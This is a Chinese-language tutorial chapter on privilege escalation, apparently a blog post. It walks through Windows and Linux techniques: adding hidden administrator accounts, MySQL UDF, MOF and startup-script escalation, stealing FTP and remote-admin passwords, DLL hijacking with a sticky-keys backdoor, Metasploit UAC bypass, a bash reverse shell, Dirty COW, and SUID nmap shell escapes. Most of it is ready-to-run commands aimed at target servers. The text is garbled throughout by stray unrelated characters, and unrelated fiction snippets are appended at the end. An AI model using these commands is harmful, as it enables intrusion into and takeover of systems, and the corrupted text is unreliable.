17.提權(quán)

提權(quán)方法:
溢出漏洞提權(quán)祸穷、數(shù)據(jù)庫提權(quán)(mysql提權(quán)(udf提權(quán),mof提權(quán)勺三,自啟動提權(quán))雷滚、mssql提權(quán))、第三方軟件提權(quán)(serv-u吗坚、flashFxp祈远、genne6 Ftp、vnc商源、radmin 车份、 zend、dll劫持牡彻、perl扫沼、cacle、pcanyWhre等)

windows提權(quán)(sc提權(quán)庄吼、不帶引號的服務路徑[在文件夾名稱帶空格的文件夾下放一個msf木馬缎除,進行shell反彈]、不安全的服務權(quán)限总寻、)伴找、linux提權(quán)(臟牛提權(quán)、suid提權(quán))

數(shù)據(jù)庫脫庫可以使用工具 通過百度查找Navicat Mysql废菱、Navicat for SQL Server技矮、Navicat for Oracle抖誉、Navicat for PostgreSQL、Navicat for SQLite等衰倦,也可以使用其它工具代替袒炉,如sqlmap、k8等類似工具樊零。

2 提權(quán)

2.1 溢出漏洞提權(quán)

溢出漏洞的全名:緩沖區(qū)溢出漏洞 因為它是在程序執(zhí)行的時候在緩沖區(qū)執(zhí)行的[錯誤代碼]我磁。所以叫緩沖區(qū)溢出漏洞。

cmd.exe執(zhí)行命令時需要讀取和寫入權(quán)限驻襟,且需要授予iuser權(quán)限夺艰。默認只有讀取的權(quán)限。
上傳大馬或者菜刀使用cmd時沉衣,無法成功執(zhí)行命令,
原因可能是運維人員把cmd的權(quán)限進行了調(diào)低郁副。只有管理員有寫入權(quán)限。

如何解決:
使用大馬或菜刀豌习,查看哪些目錄具有寫入權(quán)限(不能找?guī)Э崭竦哪夸?存谎,上傳一個cmd.exe到目錄,并設(shè)置新的終端路徑: setp c:\xxx\cmd.exe 肥隆,這樣就使用新的cmd.exe執(zhí)行命令既荚。

提權(quán)常用的命令有:

whoami ——查看用戶權(quán)限
systeminfo ——查看操作系統(tǒng),補丁情況
ipconfig——查看當前服務器IP ipconfig /all
net user——查看當前用戶情況
netstat ——查看當前網(wǎng)絡(luò)連接情況  netstat –ano  /netstat –an | find “ESTABLISHED”
tasklist ——查看當前進程情況 tasklist /svc 
taskkill ——結(jié)束進程 taskkill -PID xx
net start  ——啟動服務
net stop ——停止服務


net user best 123456 /add 添加用戶名為best栋艳,密碼為123456
net localgroup administrators best /add 將用戶名為best的用戶添加到管理員組
net user best /del 刪除best用戶

快速查找未打補丁的 exp恰聘,可以最安全的減少目標機的未知錯誤,以免影響業(yè)務吸占。 命令行下執(zhí)行檢測未打補丁的命令如下:

systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt

image.png

可以去下面的網(wǎng)址去下載對應的exploits:
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/WindowsExploits/Exploits
https://github.com/AusJock/Privilege-Escalation

2003系統(tǒng)比較出名的提權(quán)是巴黎烤肉提權(quán)晴叨、pr提權(quán)(ms-09-012)

2.1.1 pr.exe提權(quán)

Windows Server 2003和windows xp系統(tǒng)能夠使用 pr 提權(quán)。如果目標機打上了 KB952004補丁 的話旬昭,是沒有辦法使用pr進行提權(quán)的篙螟。
1.將pr.exe上傳菌湃。
2.運行pr.exe问拘,并使用命令添加賬戶并添加到管理原組。

pr.exe "net user hack 123 /add"   #新建一個hack用戶惧所,密碼為 123
pr.exe "net localgroup administrators hack /add" #將hack用戶加入administrators管理員組

3.就可以用遠程桌面登錄了骤坐,前提是目標主機開啟了3389遠程端口。
也可以使用pr.exe后接工具開啟3389端口下愈。

pr.exe "opents.exe"

2.1.2 巴西烤肉漏洞

churrasco.exe是2003系統(tǒng)一個本地提權(quán)漏洞纽绍,通過此工具可以以SYSTEM權(quán)限執(zhí)行命令,從而可以達到添加用戶的目的势似。
1.上傳churrasco.exe
2.在命令行直接輸入命令拌夏,添加賬號
D:\churrasc.exe "net user"

image.png

溢出漏洞防范方法:打補丁僧著。

2.2 數(shù)據(jù)庫提權(quán)

2.2.1 mysql提權(quán)

mysql提權(quán)的前提條件是獲取mysql賬號,密碼障簿。以及是否有遠程訪問權(quán)限盹愚。
1.如何獲取mysql賬號,密碼
方法一:
webshell查看網(wǎng)站配置文件站故。
如:conn皆怕、config、data西篓、sql愈腾、common 、inc等岂津。

方法二:
查看數(shù)據(jù)庫安裝路徑下的mysql文件 安裝目錄為/data/mysql/user.myd和user.myi

方法三:
通過暴力破解得到(hscan虱黄、Bruter、hydra寸爆、腳本木馬)

注意事項:
一礁鲁、基于安全考慮root賬戶一般只能本地訪問,但是在開發(fā)過程中可能需要打開root的遠程訪問權(quán)限赁豆。下面是基本的步驟:
1仅醇、登錄到mysql中,為root進行遠程訪問的授權(quán)魔种,執(zhí)行下面的命令:

mysql> GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY "root";
mysql> flush privileges;

第一句中"%"表示任何主機都可以遠程登錄到該服務器上訪問析二。
如果要限制只有某臺機器可以訪問,將其換成相應的IP即可节预,

GRANT ALL PRIVILEGES ON *.* TO root@“%" IDENTIFIED BY "root";

第二句表示從mysql數(shù)據(jù)庫的grant表中重新加載權(quán)限數(shù)據(jù)叶摄。因為MySQL把權(quán)限都放在了cache中,所以在做完更改后需要重新加載安拟。

二蛤吓、mysql數(shù)據(jù)庫密碼保存文件
參考:http://blog.sina.com.cn/s/blog_8028ba2f0100rzpt.html

三、菜刀數(shù)據(jù)庫連接糠赦、大馬777.php会傲、其它工具爆破
不推薦腳本,速度慢拙泽。

2.2.1.1 udf提權(quán)

1.可以使用工具mysql綜合利用工具淌山。
需要輸入ip,數(shù)據(jù)庫密碼,以及導入的目錄(如果是手工安裝的mysql:默認目錄是c:\windows\system32\udf.dll;如果是phpstudy集成環(huán)境顾瞻,則需要在安裝目錄下的mysql/lib目錄下創(chuàng)建plugin文件夾泼疑。
目錄是:)


image.png

2.執(zhí)行SQL,打開3389端口荷荤,添加用戶等退渗。
添加用戶:
select cmdshell('net user 11 test /add');


image.png

打開3389端口:
Create Function open3389 returns string soname 'udf.dll';
select open3389();
image.png

3.我們也可以使用上傳moon.php大馬來進行連接移稳。

2.2.1.2 mof提權(quán)

1.可以使用工具,創(chuàng)建賬戶會5分鐘創(chuàng)建一個会油,且刪除會再生秒裕。


image.png

2.使用菜刀上傳文件moon.mof,這個文件是創(chuàng)建一個admin賬號。
并執(zhí)行命令:

select load_file('C:\\wmpub\\moon.mof') into dumpfile 'c:/windows/system32/wbem/mof/moon.mof';

2.2.1.3 mysql啟動項提權(quán)

1钞啸、通過mysql數(shù)據(jù)庫命令寫入VBS腳本几蜻;

2、直接通過Webshell的Mysql寫入啟動項体斩;

3梭稚、通過MS12-020、MS15-034重啟服務器絮吵。

C:\php\MySQL-5.1.50\bin>mysql -uroot -proot -h192.168.1.109
mysql>drop database test1;
mysql> create database test1;
mysql> use test1;
mysql> create table a (cmd text);
mysql>insert into a values ("set wshshell=createobject (""wscript.shell"")");
mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user best best /add"",0)");
mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators best /add"",0)");
注意雙引號和括號以及后面的“0”一定要輸入弧烤!我們將用這三條命令來建立一個VBS的腳本程序!
mysql>select * from a;
mysql>select * from a into outfile "c://docume~1//administrator//「開始」菜單//程序//啟動//best.vbs";

最后通過溢出漏洞讓服務器重啟蹬敲,如:MS12-020暇昂、MS15-034


2.2.2 mssql提取

溢出漏洞是針對server 2000,2000之后的版本很少有。目前主要是通過弱口令直接提權(quán)伴嗡。

1.可以使用工具其他工具--sql鏈接--sqltools2.0.


image.png

2.2.3 安全防御

1急波、限止數(shù)據(jù)庫遠程連接,給數(shù)據(jù)庫帳戶設(shè)置密碼必須>8位以上并數(shù)字+字母+特殊符號等瘪校。

2澄暮、不要給網(wǎng)站配置root或SA權(quán)限。必須給每個網(wǎng)站獨立分配數(shù)據(jù)庫帳戶并限格控制好權(quán)限阱扬。

3泣懊、及時升級數(shù)據(jù)庫補丁。

4麻惶、安裝Waf進行防御馍刮。
5、購買數(shù)據(jù)庫審計設(shè)備

2.3 第三方提權(quán)

2.3.1 serv-u提權(quán)

存在漏洞的地方:
1.5.04以下版本可用servux.exe進行遠程溢出漏洞窃蹋。
2.權(quán)限配置不當可用svu.exe添加管理員賬號卡啰。添加命令:
** svu.exe -i ip地址 -u 用戶 -p 密碼 -a 路徑**
3.serv-u目錄文件存在修改權(quán)限,直接修改配置文件添加管理用戶脐彩。
4.serv-u目錄文件不存在修改權(quán)限碎乃,可直接通過serv-u默認本地管理員提權(quán)姊扔。

2.3.1.1 安裝配置serv.exe

1.安裝并破解serv.exe惠奸。
雙擊setup.exe(漢化包),路徑選擇serv.exe的安裝路徑恰梢。


image.png

破解:
運行patch.exe佛南。


image.png
  1. 打開serv.exe梗掰,并進行配置域。新建域嗅回,ip動態(tài)可不填及穗,一切默認。


    image.png

    新建用戶绵载,創(chuàng)建用戶名埂陆,密碼等等车柠。


    image.png

    給與新建的test賬號系統(tǒng)管理員權(quán)限创译,并且設(shè)置目錄訪問權(quán)限啥酱。
    image.png

2.3.1.2 提權(quán)

方法一:運行大馬侠畔,使用大馬中的serv-u提取功能進行提權(quán)阻桅,服務端口號為:43958(也可以使用端口掃描查看是否開啟了serv-u.exe)
這個方法是添加了一個隱藏的管理員賬號笋轨。

image.png

方法二:
1.創(chuàng)建的用戶信息保存在安裝目錄下的Serv-U\ServUDaemon.ini中穿扳。


image.png
image.png

在serv-u的客戶端刷新一下怀泊,可以查看添加的test1躯畴。


image.png

2.在物理機的cmd.exe上可以訪問ftp,進行添加賬戶民鼓。
在ftp命令行中添加賬號的命令為:

quote site exec net user best666 best /add
quote site exec net localgroup administrators best666 /add
image.png

image.png

2.3.2 FlashFxp提權(quán)

滲透測試人員只需下載quick.dat、sites.dat蓬抄、stats.dat這三個文件進行本
地替換丰嘉,就可以獲取登錄密碼。
1.安裝flashfxp之后嚷缭,查看站點供嚎,密碼可以使用星號密碼克星軟件進行查看。


image.png

2.3.3 Gene6 ftp提權(quán)

2.3.3.1 genne6 安裝

1.安裝fenne6,設(shè)置登錄密碼峭状,并進行漢化克滴。漢化時要把垃圾軟件取消勾選。默認安裝路徑是C:\Program Files\Gene6 FTP Server


image.png

語言選擇中文优床。


image.png

2.主配置文件是Remote.ini劝赔,其路徑是
C:\Program Files\Gene6 FTP Server\RemoteAdmin\Remote.ini。管理員登錄的ip胆敞、端口和密碼都存儲在這着帽。但Gene

6管理員帳號只充許本地登錄。 只能通過Webshell轉(zhuǎn)發(fā)端口才可以進行遠程連接移层。


image.png

2.3.3.2 提權(quán)

1.使用菜刀上傳工具lcx.exe
使用命令
lcx.exe –tran 600 127.0.0.1 8021 進行端口轉(zhuǎn)發(fā)仍翰。


image.png

2.在win7系統(tǒng)上也安裝genne6,并新建連接,輸入目標ip和轉(zhuǎn)發(fā)的端口600.


image.png

3.對win7電腦上的genne6進行設(shè)置观话,新建域名予借,并選擇偵聽的ip為192.168.60.102


image.png

在ftp命令模式下使用quote site 123 可以運行cmd.exe


image.png

新建用戶:


image.png

設(shè)置用戶的權(quán)限:
image.png

4.可以在win2003的系統(tǒng)上看到在win7系統(tǒng)上新添加的用戶test1。

2.3.4 PcanyWhere提權(quán)

使用的端口是5631,5632.

1.該軟件的默認安裝路徑為C:\Program Files\Symantec\pcAnywhere\

*.cif文件默認路徑為C:\DocumentS and Settings\All Users\ApplicationData\Symantec\pcAnywhere\Hosts\

2.使用webshell下載*.cif文件灵迫,使用PCAnyPass.exe破解密碼秦叛。

image.png
  1. 在另一臺電腦上安裝 PcanyWhere軟件,創(chuàng)建連接瀑粥,輸入賬號密碼挣跋。

2.3.5 Vnc提權(quán)

vnc的端口是5900/5800,可以使用端口掃描來判斷是否安裝此軟件狞换。
1.vnc的密碼是保存在
注冊表中避咆,可以在命令行輸入命令cmd /c "regedit /e c:\123.reg"HKEY_LOCAL_MACHINE\software\RealVNC\WinVNC4" ",將信1息保存為123.reg修噪。
可以使用軟件vncx4.exe進行破解牌借。

image.png

2.3.6 Radmin提權(quán)

2.3.6.1 Radmin安裝設(shè)置

1.安裝Radmin,將軟件包中的server.exe和和admdll.dll放在vm里面,cmd下運行server.exe /setup 設(shè)置密碼及輸入注冊信息割按。也可以設(shè)置圖標隱藏膨报。


image.png
image.png

2.在物理機上運行radmin.exe控制虛擬機的設(shè)備。


image.png

可以使用以下功能:


image.png

2.3.6.2提權(quán)

通過上傳的大馬的功能radmin讀取hash或者是注冊表讀取hash值進而控制虛擬機适荣。
1.大馬讀取出的hash值密碼需要轉(zhuǎn)換一下大小寫现柠,將大寫字母轉(zhuǎn)換成小寫。


image.png

2.注冊表讀取需要使用命令:

cmd /c "regedit /e c:\123.reg "HKEY_LOCAL_MACHINE\system\RAdmin\v2.0\Server\Parameters""
image.png

3.使用hash做為密碼時需要使用Radmin_Hash.exe軟件弛矛。


image.png

2.3.7 Zend 提權(quán)

phpstudy默認集成了zend,其路徑是:安裝目錄\php-5.2.17\ZendOptimizer够吩。

1.通過webshell對原ZendExtensionManager.dll重命名,同時上傳nc.exe(瑞士軍刀)和cmd.exe丈氓。


image.png

2.在物理機打開Zend_DLL_Hijacking_for_nc.exe軟件周循,進行配置。通過工具重新生成一個來木馬ZendExtensionManager.dll讓apche重啟加載万俗。
3湾笛、等apache重新加載,如果沒有加載可以手工重啟apache加載
4闰歪、telnet ip 1111登錄目錄服務器


image.png

2.3.8 DII劫持提權(quán)

要求:目錄可讀可寫嚎研,目錄下有exe文件。

1.使用工具T00ls Lpk Sethc v4.0.exe生成LPK.dll文件库倘,使用webshell上傳到一個可讀可寫临扮,目錄下有exe文件的目錄。


image.png

2.運行目錄下的exe文件教翩,然后重啟電腦杆勇。在登陸頁面先按5次shift建,之后再同時按下ab鍵饱亿,輸入密碼蚜退,就實現(xiàn)了dll劫持闰靴。


image.png

image.png

2.3.9 Windows空格、服務关霸、漏洞提權(quán)

2.3.10 perl與cacls提權(quán)

1.cacls提權(quán),使用命令:
cacls c:\index.asp /t /e /c /g interactive:f
把index.asp加入interactive組并賦予完全控制權(quán)限(IIS的IUSER_用戶就在這一組中).這樣就可以對index.asp任意編輯杰扫。

Cacls filename [/T] [/E] [/C] [/G usererm] [/R user [...]] [/P usererm [...]] [/D user [...]]
Filename:顯示訪問控制列表(以下簡稱ACL)


/T:更改當前目錄及其所有子目錄中指定文件的ACL
/E:編輯ACL而不替換
/C:在出現(xiàn)拒絕訪問錯誤時繼續(xù) 
/G Userer:perm:賦予指定用戶訪問權(quán)限队寇,Perm代表不同級別的訪問權(quán)限,其值可以是R(讀取)章姓、W(寫入)佳遣、C(更改,寫入)凡伊、F(完全控制)等零渐。
/R user:撤銷指定用戶的訪問權(quán)限,注意該參數(shù)僅在與“/E”一起使用時有效系忙。
/P user:perm:替換指定用戶的訪問權(quán)限诵盼,perm的含義同前,但增加了“N(無)”的選項银还。
/D user:拒絕指定用戶的訪問

image.png

3 windows提權(quán)

uac:是windows的安全機制风宁。(2003版本沒有)

當前獲得的權(quán)限是存在于管理員組的時候但是并且是administrator這個用戶,此時就可能需要我們進行繞過UAC的操作蛹疯,否則雖然是管理員組但是實際上并沒有管理員所對應的高權(quán)限操作,這個時候就需要bypass uac戒财。

3.1 使用木馬提權(quán)

1.在win7新添加一個用戶,新添加的用戶默認屬于user組捺弦。并切換到新加用戶的模式下饮寞。


image.png

image.png

2.用kali生成payload.exe并下載下來上傳至win7系統(tǒng)。在win7運行建立會話列吼。


image.png
image.png

3.使用getuid查看當前權(quán)限幽崩,使用getsystem進行提權(quán)。


image.png

這個情況下我們需要bypass uac寞钥。

方法一:
使用use exploit/windows/local/ask這個payload歉铝。設(shè)置信息。

或者使用use exploit/windows/local/bypassuac或者
use exploit/windows/local/bypassuac_injection

image.png

image.png

方法二:
使用漏洞提權(quán):
使用ms11-080漏洞凑耻。


image.png

3.2 不帶引號的服務路徑

參考:https://www.cnblogs.com/persuit/p/5916010.html

windows服務運行時太示,如果有可執(zhí)行文件且有完整路徑,系統(tǒng)會按照字面解釋執(zhí)行香浩。如果路徑?jīng)]有被包括在"(引號)中类缤,操作系統(tǒng)就會找含有空格路徑下的第一個實例。

根據(jù)這個漏洞邻吭,我們可以上傳木馬餐弱,然后漏洞特性造成開機自啟動。(上傳之后需要重啟)。

1.使用命令查找?guī)Э崭竦哪夸洠?/p>

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

如果在cmd.exe下不能運行wmic,是環(huán)境變量沒有進行配置膏蚓。在path變量后添加C:\Windows\System32\wbem就可以
2.將exe文件放在c:根目錄下瓢谢,重啟電腦,看是否開機自啟驮瞧。

3.3 sc 命令提權(quán)(adminstrator----system)

SC 是用于與服務控制管理器和服務進行通信的命令行程序氓扛。提供的功能類似于“控制面板”中“管理工具”項中的“服務”。
主要使用的命令有;
sc Create syscmd binPath= “cmd /K start” type= own type= interact
//創(chuàng)建一個名叫syscmd的新的交互式的cmd服務,/k是啟動后窗口不消失论笔。\c是消失

sc start systcmd //啟動新建cmd服務


image.png

3.2 linux提權(quán)

linux內(nèi)核版本由3組數(shù)字組成采郎,
第一個數(shù)字是目前發(fā)布的內(nèi)核主板本,
第二個數(shù)字:偶數(shù)表示穩(wěn)定版本狂魔,奇數(shù)表示開發(fā)中版本蒜埋。
第三個數(shù)字代表錯誤的修補次數(shù)。
查看內(nèi)核版本:uname -a
查看發(fā)行版本:cat /etc/issue
cat /etc/*-release

3.2.1 反彈shell

使用的工具是netcat(nc)最楷,瑞士軍刀整份。
1.在kali上使用nc模塊,開啟監(jiān)聽端口


image.png

2.在物理機上連接kali主機籽孙。
nc在目錄tools --提權(quán)工具--nc皂林。

3.2.2 bash直接反彈

Linux中一般默認的shell是bash,它功能幾乎可以涵蓋shell所具有的功能蚯撩,所以一般的shell腳本都會指定它為執(zhí)行路徑础倍。

常用的參數(shù)有:
bash -i :生成一個bash交互環(huán)境。

/dev/tcp/目標ip/端口: /dev/tcp/是Linux中的一個特殊設(shè)備胎挎,打開這個文件就相當于發(fā)出了一個socket調(diào)用沟启,建立一個socket連接,讀寫這個文件就相當于在這個socket連接中傳輸數(shù)據(jù)犹菇。同理德迹,Linux中還存在/dev/udp/。這個命令是讓主機與目標主機建立一個tcp連接揭芍。

&:將聯(lián)合符號前面的內(nèi)容和后面相結(jié)合然后一起重定向給后者胳搞。

0>&1:將標準的輸入與標準的輸出內(nèi)容結(jié)合,然后重定向給后面標準輸出的內(nèi)容称杨。

linux文件描述符:linux shell下有三種標準的文件描述符肌毅,分別如下:

0 - stdin 代表標準輸入,使用<或<<
1 - stdout 代表標準輸出,使用>或>>
2 - stderr 代表標準錯誤輸出,使用2>或2>>
當>&后面接文件時,表示將標準輸出和標準錯誤輸出重定向至文件姑原。
當>&后面接文件描述符時悬而,表示將前面的文件描述符重定向至后面的文件描述符

具體內(nèi)容參考:https://blog.csdn.net/Auuuuuuuu/article/details/89059176?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param

https://www.cnblogs.com/yyxianren/p/12665816.html

1.在kuli系統(tǒng)輸入命令:
bash -i >& /dev/tcp/物理機ip/端口
2.使用nc.exe軟件,輸入nc.exe -l -p 端口號


image.png

3.2.1.臟牛提權(quán)

影響范圍:linux內(nèi)核>=2.6.22
原理:關(guān)鍵函數(shù)使是get_user_pages,Copy_on_Write(cow)锭汛。
get_user_pag內(nèi)核函數(shù)在處理cow的過程中笨奠,產(chǎn)生了競爭造成了cow過程被破壞袭蝗。
復制只讀頁生成了一個帶有寫權(quán)限的新頁。

1.下載POC:https://github.com/FireFart/dirtycow

2.利用gcc編譯dirty.c文件

gcc -pthread dirty.c -o dirty -lcrypt


image.png

image.png

[圖片上傳中...(image.png-b1e76d-1598536884397-0)]


image.png

3.2 suid提權(quán)

SUID(設(shè)置用戶ID)是賦予文件的一種權(quán)限般婆,它會出現(xiàn)在文件擁有者權(quán)限的執(zhí)行位上到腥,具有這種權(quán)限的文件會在其執(zhí)行時,使調(diào)用者(普通用戶)暫時獲得該文件擁有者的權(quán)限蔚袍。
suid提權(quán):
大概意思就是就是有個文件乡范,它有s標志,并且他屬主是root页响,普通用戶運行這個程序就可以暫時有了root的權(quán)限篓足,并且這個程序還得能執(zhí)行命令段誊。

文件權(quán)限查詢:
      # ll f1
      -rwsr-xr-x. 1 root root 0 Nov 17 20:18 f1
   文件屬主的x權(quán)限,用s代替.表示被設(shè)置了SUID

如果屬主位沒有x權(quán)限,會顯示為大寫S,表示有故障(權(quán)限無效)

1.首先在本地查找符合條件的文件闰蚕,有以下三個命令

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
image.png

列出來的所有文件都是以root用戶權(quán)限來執(zhí)行的,接下來找到可以提權(quán)的文件

常用的可用于suid提權(quán)的文件
Nmap
Vim
find
Bash
More
Less
Nano
cp

namp(2.02-5.21)有交互模式连舍,可以允許執(zhí)行shell命令没陡。

如果支持交互的話,可以使用下命令進入namp交互模式
nmap --interactive
執(zhí)行命令后會返回一個shell
nmap> !sh
sh-3.2# whoami
root

3.3 使用已對外公開的exp

已對外公開 exp 注:

https://github.com/SecWiki/linux-kernel-exploits https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/ https://github.com/xairy/kernel-exploits

3.4 linux常用命令

1.內(nèi)核索赏,操作系統(tǒng)和設(shè)備信息
uname -a 打印所有可用的系統(tǒng)信息
uname -r 內(nèi)核版本
uname -n 系統(tǒng)主機名盼玄。
uname -m 查看系統(tǒng)內(nèi)核架構(gòu)(64位/32位)
hostname 系統(tǒng)主機名
cat /proc/version 內(nèi)核信息
cat /etc/*-release 分發(fā)信息
cat /etc/issue 分發(fā)信息
cat /proc/cpuinfo CPU信息

2.用戶和權(quán)限信息:

whoami        當前用戶名
id            當前用戶信息
cat /etc/sudoers  誰被允許以root身份執(zhí)行
sudo -l       當前用戶可以以root身份執(zhí)行操作

3.linux一句話添加賬號

(1)chpasswd 方法
# useradd guest;echo 'guest:123456'|chpasswd
(2)useradd -p 方法
# useradd -p `openssl passwd 123456` guest
(3)echo -e 方法
# useradd test;echo -e "123456n123456n" |passwd test

(6)其它

Linux運維最常用150個命令](http://www.reibang.com/p/979d8f5e5e65)

vim必知必會的快捷鍵

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市潜腻,隨后出現(xiàn)的幾起案子埃儿,更是在濱河造成了極大的恐慌,老刑警劉巖融涣,帶你破解...
    沈念sama閱讀 211,817評論 6 492
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件童番,死亡現(xiàn)場離奇詭異,居然都是意外死亡威鹿,警方通過查閱死者的電腦和手機剃斧,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,329評論 3 385
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來忽你,“玉大人幼东,你說我怎么就攤上這事】砌ǎ” “怎么了根蟹?”我有些...
    開封第一講書人閱讀 157,354評論 0 348
  • 文/不壞的土叔 我叫張陵,是天一觀的道長糟秘。 經(jīng)常有香客問我娜亿,道長,這世上最難降的妖魔是什么蚌堵? 我笑而不...
    開封第一講書人閱讀 56,498評論 1 284
  • 正文 為了忘掉前任买决,我火速辦了婚禮沛婴,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘督赤。我一直安慰自己嘁灯,他們只是感情好,可當我...
    茶點故事閱讀 65,600評論 6 386
  • 文/花漫 我一把揭開白布躲舌。 她就那樣靜靜地躺著丑婿,像睡著了一般。 火紅的嫁衣襯著肌膚如雪没卸。 梳的紋絲不亂的頭發(fā)上羹奉,一...
    開封第一講書人閱讀 49,829評論 1 290
  • 那天,我揣著相機與錄音约计,去河邊找鬼诀拭。 笑死,一個胖子當著我的面吹牛煤蚌,可吹牛的內(nèi)容都是我干的耕挨。 我是一名探鬼主播,決...
    沈念sama閱讀 38,979評論 3 408
  • 文/蒼蘭香墨 我猛地睜開眼尉桩,長吁一口氣:“原來是場噩夢啊……” “哼筒占!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起蜘犁,我...
    開封第一講書人閱讀 37,722評論 0 266
  • 序言:老撾萬榮一對情侶失蹤翰苫,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后这橙,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體奏窑,經(jīng)...
    沈念sama閱讀 44,189評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,519評論 2 327
  • 正文 我和宋清朗相戀三年析恋,在試婚紗的時候發(fā)現(xiàn)自己被綠了良哲。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,654評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡助隧,死狀恐怖筑凫,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情并村,我是刑警寧澤巍实,帶...
    沈念sama閱讀 34,329評論 4 330
  • 正文 年R本政府宣布,位于F島的核電站哩牍,受9級特大地震影響棚潦,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜膝昆,卻給世界環(huán)境...
    茶點故事閱讀 39,940評論 3 313
  • 文/蒙蒙 一丸边、第九天 我趴在偏房一處隱蔽的房頂上張望叠必。 院中可真熱鬧,春花似錦妹窖、人聲如沸纬朝。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,762評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽共苛。三九已至,卻和暖如春蜓萄,著一層夾襖步出監(jiān)牢的瞬間隅茎,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 31,993評論 1 266
  • 我被黑心中介騙來泰國打工嫉沽, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留辟犀,地道東北人。 一個月前我還...
    沈念sama閱讀 46,382評論 2 360
  • 正文 我出身青樓耻蛇,卻偏偏與公主長得像踪蹬,于是被迫代替她去往敵國和親胞此。 傳聞我的和親對象是個殘疾皇子臣咖,可洞房花燭夜當晚...
    茶點故事閱讀 43,543評論 2 349